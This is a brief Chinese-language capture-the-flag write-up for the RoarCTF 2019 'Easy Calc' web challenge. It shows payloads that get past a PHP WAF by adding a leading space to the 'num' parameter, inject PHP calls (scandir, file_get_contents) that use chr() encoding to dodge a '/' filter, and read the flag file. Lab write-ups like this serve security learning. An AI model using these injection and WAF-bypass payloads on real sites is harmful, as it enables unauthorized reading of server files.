BUU-WEB-[RoarCTF 2019]Easy Calc

Posted 2021-05-16 TzZzEZ-web

[RoarCTF 2019]Easy Calc

查看源码，发现有一段提示。

注释里显示，开启了WAF（web应用防护系统），但是通过源码审计并不能看出来。由于源码是php代码，猜测WAF也是使用php语言。假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”（此处num前有空格），而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。
利用scandir()尝试扫描根目录。

? num=1;var_dump(scandir("/"))

但是似乎"/"被过滤了无法执行，于是尝试使用chr(47)绕过。

? num=1;var_dump(scandir(chr(47)))

成功找到flag文件。
开始利用file_get_contents()得到flag文件的内容。

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

flag{3a850a29-b65d-44e4-906a-9a5dbca93a2f}